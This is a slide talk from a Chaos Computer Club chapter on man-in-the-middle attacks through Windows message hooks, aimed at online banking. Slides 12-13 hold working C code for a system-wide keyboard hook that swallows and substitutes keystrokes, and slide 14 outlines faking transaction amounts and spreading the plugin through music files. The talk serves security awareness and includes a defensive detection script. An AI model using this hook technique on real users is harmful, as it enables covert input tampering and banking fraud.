Attacking the User-Machine Interface - PowerPoint presentation

SLIDE 1

Attacking the User-Machine Interface

A speech from Volker Birk, dingens@bumens.org

Chaos Computer Club ERFA Kreis Ulm, http://www.ulm.ccc.de, http://www.ccc.de

SLIDE 2

CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

What's up?

  • Everybody searches for security for machine-machine interfaces.
  • Some implementations of cryptography are OK for now.
  • Nobody thinks about the security problems of the user-machine interfaces.

SLIDE 3

Example: internet-banking

[Figure: PC - Webserver - Mainframe at the bank, connected over the Internet; caption: "I'm in! That was easy!"]

SLIDE 4

The idea is not really new:

SLIDE 5

How does the Windoze GUI work?

  • Windoze is a timesharing system
      • hardware drivers in the kernel, mostly interrupt driven
      • Processes and threads in the user land
  • Windoze is a message based GUI
      • System Message Queue -> System Dispatcher -> Thread Message Queue -> Thread Dispatcher -> WindowProc for every Window Class.

SLIDE 6

How does the Windoze GUI work?

[Figure: "Click!" -> CPU -> IRQ12 -> Driver -> System-Message-Q -> System Dispatcher -> Thread-Message-Q -> Thread Dispatcher (Translate) -> WindowProc (Message Handler); example message: WM_NCHITTEST]

SLIDE 7

hello, world

    #include <windows.h>

    ATOM InitApp(HINSTANCE hInstance);                    /* registers the window class (next slide) */
    BOOL InitInstance(HINSTANCE hInstance, int nCmdShow); /* creates and shows the window (not on the slides) */

    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                       LPSTR lpCmdLine, int nCmdShow)
    {
        MSG msg;
        if (!hPrevInstance)
            InitApp(hInstance);
        InitInstance(hInstance, nCmdShow);

        /* Thread Dispatcher: take messages from the thread message queue and
           hand each one to the WindowProc of the destination window */
        while (GetMessage(&msg, NULL, 0, 0)) {
            TranslateMessage(&msg);   /* virtual-key -> character message translation */
            DispatchMessage(&msg);    /* calls the window's WindowProc */
        }
        return (int) msg.wParam;
    }

Thread Dispatcher

SLIDE 8

hello, world

    #include <windows.h>
    #include <string.h>

    LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);  /* the Message Handler, next slide */

    ATOM InitApp(HINSTANCE hInstance)
    {
        WNDCLASSEX wcex;
        memset(&wcex, 0, sizeof(WNDCLASSEX));
        wcex.cbSize        = sizeof(WNDCLASSEX);
        wcex.style         = CS_HREDRAW | CS_VREDRAW;
        wcex.lpfnWndProc   = (WNDPROC) WndProc;   /* Message Handler for this window class */
        wcex.hInstance     = hInstance;
        wcex.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
        wcex.hCursor       = LoadCursor(NULL, IDC_ARROW);
        wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
        wcex.lpszClassName = "HelloWorldClass";
        return RegisterClassEx(&wcex);
    }

Message Handler

SLIDE 9

hello, world

    #include <windows.h>

    LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
    {
        PAINTSTRUCT ps;
        HDC hdc;
        RECT rt;

        switch (message) {
        case WM_PAINT:
            hdc = BeginPaint(hWnd, &ps);
            GetClientRect(hWnd, &rt);
            DrawText(hdc, "hello, world", 12, &rt, DT_CENTER);
            EndPaint(hWnd, &ps);
            break;
        case WM_CLICK:      /* placeholder on the slide: mouse handling elided */
            /* ... */
            break;
        default:
            /* every message not handled here goes to the default handler */
            return DefWindowProc(hWnd, message, wParam, lParam);
        }
        return 0;
    }

SLIDE 10

The weak point: Hooks.

  • Message Hooks can be installed from any application before any message dispatcher.
  • Messages could be filtered or altered and transported to the Message Handlers.
  • Is there a security system? No, Sir.
  • Attacking pattern: Man in the middle attack.

SLIDE 11

Man-In-The-Middle-Attack.

[Figure: "Click!" -> Message Hook -> Windows Application (i.e. IE for banking ;-)]

SLIDE 12

Code sample

    #include <windows.h>

    typedef void (*PSETHOOKHANDLE)(HHOOK);   /* signature of SetInfo() exported by Hook.dll */
    static HMODULE m_hLib;                   /* the hook DLL (members of the app class on the slide) */
    static HHOOK   m_hHook;                  /* handle returned by SetWindowsHookEx */

    void InstallHook()
    {
        m_hLib = LoadLibrary("Hook.dll");
        FARPROC pSysMsgProc = GetProcAddress(m_hLib, "KeyboardProc");
        PSETHOOKHANDLE pSetHookHandle =
            (PSETHOOKHANDLE) GetProcAddress(m_hLib, "SetInfo");
        /* thread id 0: a system-wide hook, so every thread's keyboard messages
           pass through KeyboardProc before they reach any message dispatcher */
        m_hHook = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC) pSysMsgProc, m_hLib, 0);
        (*pSetHookHandle)(m_hHook);          /* tell the DLL its own hook handle */
    }

SLIDE 13

Code sample

    #include <windows.h>

    /* Hook.dll: the two functions looked up with GetProcAddress() on the previous slide */
    static HHOOK hHook = 0;

    void SetInfo(HHOOK newHook) { hHook = newHook; }

    LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
    {
        /* wParam is the virtual-key code; bit 31 of lParam is set on key-up */
        if (nCode == HC_ACTION && wParam == VK_DECIMAL) {
            // hPlayback = SetWindowsHookEx(WH_JOURNALPLAYBACK,
            //                              JournalPlaybackProc, theApp.m_hInstance, 0);
            /* 13502 is truncated to the BYTE 0xBE = VK_OEM_PERIOD, scan code 52 */
            if (lParam & 0x80000000)
                keybd_event(13502, 52, KEYEVENTF_KEYUP, 0);
            else
                keybd_event(13502, 52, 0, 0);
            return 1;   /* non-zero: the original keystroke is not passed on */
        }
        return CallNextHookEx(hHook, nCode, wParam, lParam);
    }
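A system-wide hook like the one above is set with thread id 0, which makes Windows map the hook DLL into every process that receives keyboard messages; listing which processes share an unexpected module is therefore a cheap defender-side check. This is an added example, not code from the talk; the module name "Hook.dll" is taken from the slide and the function name is made up here.

```powershell
# Added example (not from the talk): find every process that has a given
# module loaded. A DLL that shows up in dozens of unrelated GUI processes is
# the footprint of a system-wide SetWindowsHookEx() hook; correlate the hits
# with the file's path and Authenticode signer before drawing conclusions.
function Find-InjectedModule {
    param([Parameter(Mandatory)][string]$ModuleName)

    Get-Process | ForEach-Object {
        $proc = $_
        try {
            $hit = $proc.Modules | Where-Object { $_.ModuleName -ieq $ModuleName }
        } catch {
            # 32/64-bit mismatch or a protected/elevated process: module list not readable
            $hit = $null
        }
        if ($hit) {
            [pscustomobject]@{
                ProcessName = $proc.ProcessName
                Id          = $proc.Id
                Path        = ($hit | Select-Object -First 1).FileName
            }
        }
    }
}

# Module name from the slide; run from an elevated shell to see all processes.
Find-InjectedModule -ModuleName 'Hook.dll' | Format-Table -AutoSize
```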

SLIDE 14

Being creative with internet banking

  • User enters "42", computer understands "23", user reads "42"
  • User is authenticating this transaction.
  • Computer is transacting "23".
  • With an Internet Explorer plugin we don't need any extra processes.
  • Distributing such plugins made easy by using music files with Windows XP.

SLIDE 15

And now? What can we do?

  • Better forget Windows for banking purposes.
  • Better forget the Macintosh for banking purposes also.
  • X11 offers a security system. But who knows that and who is using it?
  • Better: cold boot from CD.

SLIDE 16

Chaos Computer Club.

Kabelsalat ist gesund. (Cable spaghetti is healthy.)

Thank you!

Volker Birk, CCC ERFA Kreis Ulm
mailto:dingens@bumens.org

http://www.ulm.ccc.de
http://www.ccc.de